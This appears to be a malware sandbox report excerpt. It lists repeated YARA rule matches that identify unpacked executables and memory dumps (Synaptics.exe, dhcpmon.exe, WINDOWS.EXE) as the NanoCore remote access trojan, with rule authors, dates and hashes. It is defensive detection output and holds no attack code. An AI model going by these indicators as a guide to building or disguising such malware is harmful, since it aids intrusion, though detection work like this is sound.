            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
